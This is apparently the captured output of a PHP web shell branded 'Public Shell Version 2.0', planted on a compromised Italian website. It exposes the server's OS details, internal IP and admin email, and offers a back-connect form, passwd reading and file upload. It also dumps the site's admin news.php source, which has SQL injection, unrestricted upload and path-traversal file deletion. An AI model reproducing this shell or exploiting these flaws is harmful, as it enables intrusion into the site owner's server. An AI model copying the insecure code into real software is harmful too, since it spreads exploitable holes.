GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/admin/function/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/admin/function/news.php

<?php

//////////////////////////NEWS
function listan() {
	global $conn, $id;



	$output = 	'<div class="row">
					<div class="col-md-3">
						<div class="headline">
							<h3>Lista Post</h3> 
						</div>
					</div>										 
					<div class="col-md-3 padding-top10"> 			

						<form class="form-search pull-right" enctype="multipart/form-data" action="?azione=filtran" method="post">						
						<div class="input-group">
						 
						<select class="form-control" id="filtro" name="filtro">
							<option id="all" value="all" name="all">Tutti</option>
							<option id="tee" value="tee" name="tee">T-shirt</option>
							<option id="frame" value="frame" name="frame">Frame</option>
						</select>
						<span class="input-group-btn">
						<button class="btn btn-danger" type="submit">FILTRA</button>
						</span>
						
						</div>						
						</form>	
					</div>
					<div class="col-md-3 padding-top10"> 
					
					
						<form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultn" method="post">						
						<div class="input-group">
						
						<input class="form-control" type="text" name="ricerca">
						<span class="input-group-btn">
						<button class="btn btn-danger" type="submit"><i class="icon-search"></i></button>
						</span>
						
						</div>						
						</form>					
										
					</div>					
					<div class="col-md-3 padding-top10">
						<a href="?azione=inseriscin" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a>
					</div>		
				</div>'; 
		

	$output .= '<div class="row">
					<div class="col-md-12">
						<div class="table-wrapper">

				    		<div class="wrapper-panel">     
				    		<table class="table table-striped" id="tab" > 
				      			<thead>
									<tr>
									    <th>Titolo</th>
									    <th>Data</th>  
									    <th>Categorie</th>								    
									    <th></th>
									    <th></th>	
   									</tr>
								</thead>
				      			<tbody>';
			      							
			$result=mysql_query('SELECT * FROM lavori order by lav_id DESC');
			  while($row=mysql_fetch_assoc($result))

					  
			  {

				$g=substr($row['lav_data'],8,2);
				$m=substr($row['lav_data'],5,2);
					$mesi["01"]="Gennaio";
					$mesi["02"]="Febbraio";
					$mesi["03"]="Marzo";
					$mesi["04"]="Aprile";
					$mesi["05"]="Maggio";
					$mesi["06"]="Giugno";
					$mesi["07"]="Luglio";
					$mesi["08"]="Agosto";
					$mesi["09"]="Settembre";
					$mesi["10"]="Ottobre";
					$mesi["11"]="Novembre";
					$mesi["12"]="Dicembre";
					$mese=$mesi[$m];
				$a=substr($row['lav_data'],0,4);
				$data=$g.' '.$mese.' '.$a;
				$giorni = array('Domenica','Lunedì','Martedì','Mercoledì','Giovedì','Venerdì','Sabato');
				$giornosettimana=($row['lav_data']);		
				
			  	if($row['lav_cat']=='grafica'){$row['lav_cat']='<span class="label label-info">Grafica</span>';}				
			  	if($row['lav_cat']=='tee'){$row['lav_cat']='<span class="label label-success">T-shirt</span>';}				
			  	if($row['lav_cat']=='logo'){$row['lav_cat']='<span class="label label-danger">Logo design</span>';}
			  	if($row['lav_cat']=='contest'){$row['lav_cat']='<span class="label label-info">Contest</span>';}				
			  	if($row['lav_cat']=='web'){$row['lav_cat']='<span class="label label-warning">Web</span>';} 
			  	if($row['lav_cat']=='music'){$row['lav_cat']='<span class="label label-danger">Musica</span>';}
			  	if($row['lav_cat']=='news'){$row['lav_cat']='<span class="label label-success">News</span>';}
			  	if($row['lav_cat']=='frame'){$row['lav_cat']='<span class="label label-info">Frame</span>';}
								
		$output.='<tr>		
                     <td><a href="?azione=visualizzan&id='.$row['lav_id'].'"><i class="icon-signin"></i>&nbsp; '.$row['lav_titolo'].'</a></td>
                     <td>'.$data.'</td>                     
                     <td>'.$row['lav_cat'].'</td>';

          $output.=' <td><a title="Modifica" href="?azione=modifican&id='.$row['lav_id'].'"><i class="icon-edit"></i></a></td>
                     <td><a class="right cancel show-option" title="Elimina" href="?azione=eliminan&id='.$row['lav_id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>';                                                         

		$output.='</tr>';	
			  } 
		$output .= '</tbody>
			    </table>
			</div>
			    			<div class="wrapper-paging">
			      				<ul>
									<li><a class="paging-back">&lt;</a></li>
									<li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li>
									<li><a class="paging-next">&gt;</a></li>
								</ul>
			    			</div>		
	    </div>	 
	</div>
</div><br />';
		return ($output);

}



function resultn() {
	global $conn, $id;
	if (isset ($_POST['ricerca'])){$ricerca = mysql_real_escape_string($_POST['ricerca']);}else{$ricerca = '';}
	if (isset ($_POST['filtro'])){$filtro = mysql_real_escape_string($_POST['filtro']);}else{$filtro = '';}
	
	$output = 	'<div class="row">
					<div class="col-md-3">
						<div class="headline">
							<h3>Lista Post</h3> 
						</div>
					</div>										 
					<div class="col-md-3 padding-top10"> 			

						<form class="form-search pull-right" enctype="multipart/form-data" action="?azione=filtran" method="post">						
						<div class="input-group">
						 
						<select class="form-control" name="filtra">
						<option id="all" name="all">Tutti</option>
						<option id="tee" name="tee">T-shirt</option>
						<option id="frame" name="frame">Frame</option>
						</select>
						<span class="input-group-btn">
						<button class="btn btn-danger" type="submit">FILTRA</button>
						</span>
						
						</div>						
						</form>	
					</div>
					<div class="col-md-3 padding-top10"> 
					
					
						<form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultn" method="post">						
						<div class="input-group">
						
						<input class="form-control" type="text" name="ricerca">
						<span class="input-group-btn">
						<button class="btn btn-danger" type="submit"><i class="icon-search"></i></button>
						</span>
						
						</div>						
						</form>					
										
					</div>					
					<div class="col-md-3 padding-top10">
						<a href="?azione=inseriscin" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a>
					</div>		
				</div>'; 
		

	$output .= '<div class="row">
					<div class="col-md-12">
						<div class="table-wrapper">

				    		<div class="wrapper-panel">     
				    		<table class="table table-striped" id="tab" > 
				      			<thead>
									<tr>
									    <th>Titolo</th>
									    <th>Data</th>  
									    <th>Categoria</th>								    
									    <th></th>
									    <th></th>	
   									</tr>
								</thead>
				      			<tbody>';
			      							
			$result=mysql_query('SELECT * FROM lavori WHERE lav_titolo like \'%' . $ricerca . '%\' order by lav_id DESC');
			  while($row=mysql_fetch_assoc($result))

					  
			  {


				$g=substr($row['lav_data'],8,2);
				$m=substr($row['lav_data'],5,2);
					$mesi["01"]="Gennaio";
					$mesi["02"]="Febbraio";
					$mesi["03"]="Marzo";
					$mesi["04"]="Aprile";
					$mesi["05"]="Maggio";
					$mesi["06"]="Giugno";
					$mesi["07"]="Luglio";
					$mesi["08"]="Agosto";
					$mesi["09"]="Settembre";
					$mesi["10"]="Ottobre";
					$mesi["11"]="Novembre";
					$mesi["12"]="Dicembre";
					$mese=$mesi[$m];
				$a=substr($row['lav_data'],0,4);
				$data=$g.' '.$mese.' '.$a;
				$giorni = array('Domenica','Lunedì','Martedì','Mercoledì','Giovedì','Venerdì','Sabato');
				$giornosettimana=($row['lav_data']);		
				
			  	if($row['lav_cat']=='grafica'){$row['lav_cat']='<span class="label label-info">Grafica</span>';}				
			  	if($row['lav_cat']=='tee'){$row['lav_cat']='<span class="label label-success">T-shirt</span>';}				
			  	if($row['lav_cat']=='logo'){$row['lav_cat']='<span class="label label-danger">Logo design</span>';}
			  	if($row['lav_cat']=='contest'){$row['lav_cat']='<span class="label label-info">Contest</span>';}				
			  	if($row['lav_cat']=='web'){$row['lav_cat']='<span class="label label-info">Web</span>';} 
			  	if($row['lav_cat']=='music'){$row['lav_cat']='<span class="label label-danger">Musica</span>';}
			  	if($row['lav_cat']=='news'){$row['lav_cat']='<span class="label label-success">News</span>';}
			  	if($row['lav_cat']=='frame'){$row['lav_cat']='<span class="label label-info">Frame</span>';}


								
		$output.='<tr>		
                     <td><a href="?azione=visualizzan&id='.$row['lav_id'].'"><i class="icon-signin"></i>&nbsp; '.$row['lav_titolo'].'</a></td>
                     <td>'.$data.'</td>                     
                     <td>'.$row['lav_cat'].'</td>';

          $output.=' <td><a title="Modifica" href="?azione=modifican&id='.$row['lav_id'].'"><i class="icon-edit"></i></a></td>
                     <td><a class="right cancel show-option" title="Elimina" href="?azione=eliminan&id='.$row['lav_id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>';                                                         

		$output.='</tr>';	
			  } 
		$output .= '</tbody>
			    </table>
			</div>
			    			<div class="wrapper-paging">
			      				<ul>
									<li><a class="paging-back">&lt;</a></li>
									<li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li>
									<li><a class="paging-next">&gt;</a></li>
								</ul>
			    			</div>		
	    </div>	 
	</div>
</div><br />';
		return ($output);


}	


function filtran() {
	global $conn, $id;
	if (isset ($_POST['ricerca'])){$ricerca = mysql_real_escape_string($_POST['ricerca']);}else{$ricerca = '';}
	if (isset ($_POST['filtro'])){$filtro = mysql_real_escape_string($_POST['filtro']);}else{$filtro = '';}

	
	$output = 	'<div class="row">
					<div class="col-md-3">
						<div class="headline">
							<h3>Lista Post</h3> 
						</div>
					</div>										 
					<div class="col-md-3 padding-top10"> 			

						<form class="form-search pull-right" enctype="multipart/form-data" action="?azione=filtran" method="post">						
						<div class="input-group">
						 
						<select class="form-control" name="filtra">
						<option id="all" name="all">Tutti</option>
						<option id="tee" name="tee">T-shirt</option>
						<option id="frame" name="frame">Frame</option>
						</select>
						<span class="input-group-btn">
						<button class="btn btn-danger" type="submit">FILTRA</button>
						</span>
						
						</div>						
						</form>	
					</div>
					<div class="col-md-3 padding-top10"> 
					
					
						<form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultn" method="post">						
						<div class="input-group">
						
						<input class="form-control" type="text" name="ricerca">
						<span class="input-group-btn">
						<button class="btn btn-danger" type="submit"><i class="icon-search"></i></button>
						</span>
						
						</div>						
						</form>					
										
					</div>					
					<div class="col-md-3 padding-top10">
						<a href="?azione=inseriscin" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a>
					</div>		
				</div>'; 
		

	$output .= '<div class="row">
					<div class="col-md-12">
						<div class="table-wrapper">

				    		<div class="wrapper-panel">     
				    		<table class="table table-striped" id="tab" > 
				      			<thead>
									<tr>
									    <th>Titolo</th>
									    <th>Data</th>  
									    <th>Categoria</th>								    
									    <th></th>
									    <th></th>	
   									</tr>
								</thead>
				      			<tbody>';
			      							
			$result=mysql_query('SELECT * FROM lavori WHERE lav_cat like \'%' . $filtro . '%\' order by lav_id DESC');
			  while($row=mysql_fetch_assoc($result))

					  
			  {


				$g=substr($row['lav_data'],8,2);
				$m=substr($row['lav_data'],5,2);
					$mesi["01"]="Gennaio";
					$mesi["02"]="Febbraio";
					$mesi["03"]="Marzo";
					$mesi["04"]="Aprile";
					$mesi["05"]="Maggio";
					$mesi["06"]="Giugno";
					$mesi["07"]="Luglio";
					$mesi["08"]="Agosto";
					$mesi["09"]="Settembre";
					$mesi["10"]="Ottobre";
					$mesi["11"]="Novembre";
					$mesi["12"]="Dicembre";
					$mese=$mesi[$m];
				$a=substr($row['lav_data'],0,4);
				$data=$g.' '.$mese.' '.$a;
				$giorni = array('Domenica','Lunedì','Martedì','Mercoledì','Giovedì','Venerdì','Sabato');
				$giornosettimana=($row['lav_data']);		
				
			  	if($row['lav_cat']=='grafica'){$row['lav_cat']='<span class="label label-info">Grafica</span>';}				
			  	if($row['lav_cat']=='tee'){$row['lav_cat']='<span class="label label-success">T-shirt</span>';}				
			  	if($row['lav_cat']=='logo'){$row['lav_cat']='<span class="label label-danger">Logo design</span>';}
			  	if($row['lav_cat']=='contest'){$row['lav_cat']='<span class="label label-info">Contest</span>';}				
			  	if($row['lav_cat']=='web'){$row['lav_cat']='<span class="label label-info">Web</span>';} 
			  	if($row['lav_cat']=='music'){$row['lav_cat']='<span class="label label-danger">Musica</span>';}
			  	if($row['lav_cat']=='news'){$row['lav_cat']='<span class="label label-success">News</span>';}
			  	if($row['lav_cat']=='frame'){$row['lav_cat']='<span class="label label-info">Frame</span>';}


								
		$output.='<tr>		
                     <td><a href="?azione=visualizzan&id='.$row['lav_id'].'"><i class="icon-signin"></i>&nbsp; '.$row['lav_titolo'].'</a></td>
                     <td>'.$data.'</td>                     
                     <td>'.$row['lav_cat'].'</td>';

          $output.=' <td><a title="Modifica" href="?azione=modifican&id='.$row['lav_id'].'"><i class="icon-edit"></i></a></td>
                     <td><a class="right cancel show-option" title="Elimina" href="?azione=eliminan&id='.$row['lav_id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>';                                                         

		$output.='</tr>';	
			  } 
		$output .= '</tbody>
			    </table>
			</div>
			    			<div class="wrapper-paging">
			      				<ul>
									<li><a class="paging-back">&lt;</a></li>
									<li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li>
									<li><a class="paging-next">&gt;</a></li>
								</ul>
			    			</div>		
	    </div>	 
	</div>
</div><br />';
		return ($output);


}	

	
function visualizzan() {
	global $conn, $id;
	
	      							
			$result=mysql_query('SELECT * FROM lavori WHERE lav_id='.$id.'');
			$row=mysql_fetch_assoc($result);

				$g=substr($row['lav_data'],8,2);
				$m=substr($row['lav_data'],5,2);
					$mesi["01"]="Gennaio";
					$mesi["02"]="Febbraio";
					$mesi["03"]="Marzo";
					$mesi["04"]="Aprile";
					$mesi["05"]="Maggio";
					$mesi["06"]="Giugno";
					$mesi["07"]="Luglio";
					$mesi["08"]="Agosto";
					$mesi["09"]="Settembre";
					$mesi["10"]="Ottobre";
					$mesi["11"]="Novembre";
					$mesi["12"]="Dicembre";
					$mese=$mesi[$m];
				$a=substr($row['lav_data'],0,4);
				$data=$g.' '.$mese.' '.$a;
				$giorni = array('Domenica','Lunedì','Martedì','Mercoledì','Giovedì','Venerdì','Sabato');
				$giornosettimana=($row['lav_data']);		

			  	if($row['lav_cat']=='grafica'){$row['lav_cat']='<span class="label label-info">Grafica</span>';}				
			  	if($row['lav_cat']=='tee'){$row['lav_cat']='<span class="label label-success">T-shirt</span>';}				
			  	if($row['lav_cat']=='logo'){$row['lav_cat']='<span class="label label-danger">Logo design</span>';}
			  	if($row['lav_cat']=='contest'){$row['lav_cat']='<span class="label label-info">Contest</span>';}				
			  	if($row['lav_cat']=='web'){$row['lav_cat']='<span class="label label-info">Web</span>';}
			  	if($row['lav_cat']=='musica'){$row['lav_cat']='<span class="label label-danger">Musica</span>';}
			  	if($row['lav_cat']=='news'){$row['lav_cat']='<span class="label label-success">News</span>';}

				
	
	$output = '
<div class="row">
	<div class="col-md-9">
		<div class="headline">
			<h3>'.$row['lav_titolo'].'</h3>
		</div>
	</div>				
	<div class="col-md-3">
		<a class="btn btn-default pull-right" title="Modifica" href="?azione=modifican&id='.$row['lav_id'].'"><i class="icon-edit"></i> Modifica</a>
		<a class="btn btn-default pull-right" href="javascript:history.back()" style="margin-right:10px"><i class="icon-reply"></i> Torna indietro</a>
		
	</div>
</div>	

<div class="row">
	<div class="col-md-6">					
		<div class="row">
			<div class="col-md-12">
				<h4>Descrizione</h4>
				<p>'.$row['lav_desc'].'</p>	
			</div>
		</div>				
		<div class="row">
			<div class="col-md-12">
				<h4>Data</h4>
				<p>'.$data.'</p>	
			</div>			
		</div>				
		<div class="row margin-bottom-20">
			<div class="col-md-12">	
				<h4>Categorie</h4>				
				'.$row['lav_cat'].'
			</div>
		</div>			
		
		
				
	</div>	 
	<div class="col-md-6">
		<div class="row">';
		$result=mysql_query('SELECT * FROM img WHERE img_lav_id='.$id.'');
		while ($row=mysql_fetch_assoc($result))
		{
		$output .='	
		<div class="col-sm-4">
		<img width="100px" class="responsive" src="img/lavori/'.$row['img_href'].'" /> 
		</div>';
		}
	$output .='</div>		
	</div>
	</div>
					

</div><br /><br />';

	return ($output);

}

function inseriscin() {
	global $conn, $id;
	$output = '
<div class="row">
	<div class="col-md-10">
		<div class="headline">
			<h3>Inserisci Post</h3>
		</div>
	</div>				
	<div class="col-md-2">
		<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
	</div>
</div>	

<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvan" method="post">		
		<div class="row">
			<div class="col-md-6">					
				<h4>Titolo</h4>
				<input class="form-control" type="text" placeholder="titolo" name="titolo"><br />
			</div>
			<div class="col-md-6">					
				<h4>Titolo [ENG]</h4>
				<input class="form-control" type="text" placeholder="title" name="titolo_en"><br />
			</div>		
		</div>

		<div class="row margin-bottom-20">
			<div class="col-md-6">
				<h4>Descrizione</h4>
				<textarea class="form-control" type="text" id="descrizione" name="descrizione"></textarea>		
			</div>
			<div class="col-md-6">
				<h4>Descrizione [ENG]</h4>
				<textarea class="form-control" type="text" id="descrizione_en" name="descrizione_en"></textarea>		
			</div>
		</div>				
		<div class="row">
			<div class="col-md-4">
				<h4>Data</h4>
				<input class="form-control" id="miadata" type="text" placeholder="data" name="miadata"><br />
			</div>			
		</div>				
		<div class="row margin-bottom-40">
			<div class="col-md-6">	
				<h4>Categoria</h4>				
	            
				<select id="cat" name="cat" class="form-control">
					<option value="grafica">Grafica</option>
					<option value="tee">T-shirt</option>
					<option value="logo">Logo design</option>
					<option value="contest">Contest</option>
					<option value="web">Web</option>
					<option value="music">Musica</option>
					<option value="news">News</option>	
					<option value="frame">Frame of Me</option>	
				</select>
				
								
			</div>
		</div>	
		
	
	<div class="row">

		<div class="col-md-12">
			<div class="row">	
			<div class="container">
				<h2>Immagini</h2>				
				<!-- START INSERIMENTO IMMAGINI -->
			</div>
				<input type="hidden" id="contatore" name="contatore" value="1">				
				<input type="button" class="btn btn-danger pull-right" id="aggiungi_elemento" value="aggiungi immagine"><br /><br />								
			</div>
			<div class="row">	
			
				<table class="table">	
					<tbody>
						<tr class="riga">
							<td>
								<div id="file1" class="divs">
									<input type="file" id="img1" name="img1">
								</div>
							</td>									
							<td>
								<input style="display:none" type="button" id="aggiungi_testo" value="aggiungi testo">
							</td>	 							
						</tr>
					</tbody>
				</table>
			</div>		
		</div>
	</div>						
	<div class="row">
		<div class="col-md-12">
			<button class="btn btn-default" type="submit">Salva</button><br /><br />
		</div>
	</div>						
</form>';

	return ($output);

}

function salvan() {
	global $conn, $id;
	$errore = 0;
  	$titolo = $_POST['titolo'];
   	$titolo_en = $_POST['titolo_en']; 	
  	$descrizione =$_POST['descrizione'];	
  	$descrizione_en = $_POST['descrizione_en'];				
  	
  	$cat = $_POST['cat'];	
  	$miadata = $_POST['miadata'];	  	
	$g = substr($miadata, 3, 2);
	$m = substr($miadata, 0, 2);
	$a = substr($miadata, 6, 4);
	$data = $a . '-' . $m . '-' . $g . ' 00:00:00';			
	
	
	
	/////SE NON CI SONO ERRORI		
	if ($errore == 0) {

		/////SE ID = O UGUALE NUOVO INSERIMENTO			
		if ($id == 0) {
			
			$sql = 'insert into lavori(lav_titolo, lav_desc, lav_data, lav_cat) values("' . $titolo . '", "' . $descrizione . '", "' . $data . '", "' . $cat . '")';
			mysql_query($sql, $conn) or die(mysql_error());
			$sql_en = 'insert into lavori_en(lav_titolo, lav_desc, lav_data, lav_cat) values("' . $titolo_en . '", "' . $descrizione_en . '", "' . $data . '", "' . $cat . '")';
			mysql_query($sql_en, $conn) or die(mysql_error());					
			$id=mysql_insert_id();
			
			header('location: cms.php?ins&azione=listan');
 
			
		/////ALTRIMENTI SE ID VALORIZZATO FAI LA MODIFICA					
		} else {		
			
			$sql = 'update lavori set lav_titolo="' . $titolo . '", lav_desc="' . $descrizione . '", lav_data="' . $data . '", lav_cat="' . $cat . '" where lav_id="' . $id . '" ';
			mysql_query($sql, $conn) or die(mysql_error());					
			$sql_en = 'update lavori_en set lav_titolo="' . $titolo_en . '", lav_desc="' . $descrizione_en . '", lav_data="' . $data . '", lav_cat="' . $cat . '" where lav_id="' . $id . '" ';
			mysql_query($sql_en, $conn) or die(mysql_error());			

			header('location: cms.php?agg&azione=listan');
		}
		
	
		///////////////IMMGINI	
		$result=mysql_query('SELECT * FROM lavori WHERE lav_id="'.$id.'"');
		$row=mysql_fetch_assoc($result);
		$img_lav_id=$row['lav_id'];					


		
		/////INIZIO CICLO FOR
		for($i=1; $i<100; $i++){
			
			$size=$_FILES['img'.$i.'']['size'];
				if ($size==0){
					die();
				}
				
				else{
					$img = $_FILES['img'.$i.''];	
					if(!empty($img)){
						$sql2 = 'insert into img(img_href, img_lav_id) values("' . $img . '","' . $img_lav_id . '")';
						mysql_query($sql2, $conn) or die(mysql_error());
						$ins_id=mysql_insert_id();
						}
					else{
					echo 'campo IMG Vuoto';	
					}	
				}
			 
				//************************************upload
			if(is_uploaded_file($_FILES['img'.$i.'']['tmp_name'])){ 
				$cartella=$a.'_'.$m;
				$upload_dir='img/lavori/'.$cartella.'/'; //in produzione cambiare percorso!!
				if(!file_exists($upload_dir)){mkdir($upload_dir,0777);}
				$filename=$ins_id.'_'.$id.'_'.$_FILES['img'.$i.'']['name'];    
				move_uploaded_file($_FILES['img'.$i.'']['tmp_name'],$upload_dir.$filename);
				$sql3='update img set img_href="'.$cartella.'/'.$filename.'" where img_id='.$ins_id.' ';
				mysql_query($sql3);
	
				}			 

	
		}/////FINE CICLO FPR	
		
		
		
					
				
				
				

			////// ALTRIMENTI SE S^CI SONO ERRORI
			} else {
					$output = 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>';
					}
	return ($output);
}



function modifican() {
	global $conn, $id;
			$result=mysql_query('SELECT * FROM lavori WHERE lav_id='.$id.'');
			$row=mysql_fetch_assoc($result);	

			$result_en=mysql_query('SELECT * FROM lavori_en WHERE lav_id='.$id.'');
			$row_en=mysql_fetch_assoc($result_en);

			
			
			$g=substr($row['lav_data'],8,2);
			$m=substr($row['lav_data'],5,2);
				$mesi["01"]="Gennaio";
				$mesi["02"]="Febbraio";
				$mesi["03"]="Marzo";
				$mesi["04"]="Aprile";
				$mesi["05"]="Maggio";
				$mesi["06"]="Giugno";
				$mesi["07"]="Luglio";
				$mesi["08"]="Agosto";
				$mesi["09"]="Settembre";
				$mesi["10"]="Ottobre";
				$mesi["11"]="Novembre";
				$mesi["12"]="Dicembre";
				$mese=$mesi[$m];
			$a=substr($row['lav_data'],0,4);
			$data=$m.'/'.$g.'/'.$a;
			$giorni = array('Domenica','Lunedì','Martedì','Mercoledì','Giovedì','Venerdì','Sabato');
			$giornosettimana=($row['lav_data']);		
			
			
			
			

	$output = '
<div class="row">
	<div class="col-md-10">
		<div class="headline">
			<h3>Modifica Lavoro</h3>
		</div>
	</div>				
	<div class="col-md-2">
		<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
	</div>
</div>	



<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvan&id='.$id.'" method="post">
	<div class="row">
		<div class="col-md-6">					
			<h4>Titolo</h4>
			<input class="form-control" type="text" placeholder="titolo" name="titolo" value="'.$row['lav_titolo'].'"><br />
		</div>
		<div class="col-md-6">					
			<h4>Titolo [ENG]</h4>
			<input class="form-control" type="text" placeholder="title" name="titolo_en"  value="'.$row_en['lav_titolo'].'"><br />
		</div>		
	</div>
	<div class="row margin-bottom-40">
		<div class="col-md-6">
			<h4>Descrizione</h4>
			<textarea class="form-control" type="text" id="descrizione" name="descrizione">'.$row['lav_desc'].'</textarea>		
		</div>
		<div class="col-md-6">
			<h4>Descrizione [ENG]</h4>
			<textarea class="form-control" type="text" id="descrizione_en" name="descrizione_en">'.$row_en['lav_desc'].'</textarea>		
		</div>
	</div>				
	<div class="row">
		<div class="col-md-4">
			<h4>Data</h4>
					<input class="form-control" id="miadata" type="text" placeholder="data" name="miadata" value="'.$data.'"><br />
		</div>			
	</div>				
	<div class="row margin-bottom-40">
		<div class="col-md-6">	
			<h4>Categoria</h4>				
	        
				<select id="cat" name="cat" class="form-control">
					<option value="grafica"';if ($row['lav_cat']=='grafica'){$output .='selected';}$output .='>Grafica</option>
					<option value="tee"';if ($row['lav_cat']=='tee'){$output .='selected';}$output .='>T-shirt</option>
					<option value="logo"';if ($row['lav_cat']=='logo'){$output .='selected';}$output .='>Logo design</option>
					<option value="contest"';if ($row['lav_cat']=='green'){$output .='selected';}$output .='>Contest</option>
					<option value="web"';if ($row['lav_cat']=='web'){$output .='selected';}$output .='>Web</option>
					<option value="music"';if ($row['lav_cat']=='music'){$output .='selected';}$output .='>Musica</option>
					<option value="news"';if ($row['lav_cat']=='news'){$output .='selected';}$output .='>News</option>	
					<option value="frame"';if ($row['lav_cat']=='frame'){$output .='selected';}$output .='>Frame of me</option>	
				</select>
												
		</div>
	</div>


	


		
	<div class="row">';

			$result=mysql_query('SELECT * FROM img WHERE img_lav_id='.$id.'');
			while ($row=mysql_fetch_assoc($result))
			{
			$file=substr($row['img_href'], 8);
			$cartella=substr($row['img_href'], 0, 7);			
				 	
			$output .='	
			<div class="col-md-4">
				<img width="100px" class="responsive" src="img/lavori/'.$row['img_href'].'" /> 
				<a href="?del&azione=modifican&id='.$id.'&delete=' . $file . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a>
			</div>';
			}
		$output .='</div>	<br />	
	
	
	
	
	<div class="row">
		<div class="col-md-12">
			<div class="row">					
				<!-- START INSERIMENTO IMMAGINI -->
				<input type="hidden" id="contatore" name="contatore" value="1">				
				<input type="button" class="btn btn-danger pull-right" id="aggiungi_elemento" value="aggiungi immagine"><br /><br />								
			</div>
			<div class="row">				
				<table class="table">	
					<tbody>
						<tr class="riga">
							<td>
								<div id="file1" class="divs">
									<input type="file" id="img1" name="img1">
								</div>
							</td>									
							<td>
								<input style="display:none" type="button" id="aggiungi_testo" value="aggiungi testo">
							</td>	 							
						</tr>
					</tbody>
				</table>
			</div>		
		</div>
	</div>						
	<div class="row">
		<div class="col-md-12">
			<button class="btn btn-default" type="submit">Salva</button><br /><br />
		</div>
	</div>						
</form>';


	if (isset($_GET['delete'])){


			$trovaunderscore=strpos($_GET['delete'], '_');
			$idimg=(substr($_GET['delete'],0,$trovaunderscore)) ;	
			
			
			
			global $conn, $id;
			$sql = 'DELETE FROM img WHERE img_id='.$idimg.'';
			mysql_query($sql) or die(mysql_error());
			header('location: cms.php?del&azione=modifican&id='.$id.'');	
					
//////implementare l'inserimento con l'id dell'immagine per poterla cancellare dal db attraverso di esso
			$immagine = 'img/lavori/'.$cartella.'/' . $_GET['delete'];
		
			
				if (!unlink($immagine)) {

					echo("Impossibile eliminare $immagine <br>");
				} else {

				}
//	echo("<br><a href=index.php?azione=listimg>Torna Indietro</a><br>");
	}





	return ($output);

}




function eliminan() {
	global $conn, $id;
	$sql = 'delete from lavori where lav_id="' . $id . '"';
	mysql_query($sql) or die(mysql_error());

	$sql_en = 'delete from lavori_en where lav_id="' . $id . '"';
	mysql_query($sql_en) or die(mysql_error());
	
	$sql2 = 'delete from img where img_lav_id="' . $id . '"';
	mysql_query($sql2) or die(mysql_error());
		
	
	
	header('location: cms.php?del&azione=listan');
	
 //qui bisognerebbe im pkementare la funzione per cancellare tutte le immagini nella cartella, ma bisogna rivedere la creazione delle cartelle, non più per data ama per data_id in modo da avere una cartella univoca e fare unlink della cartella
 	
}

?>

Public Shell Version 2.0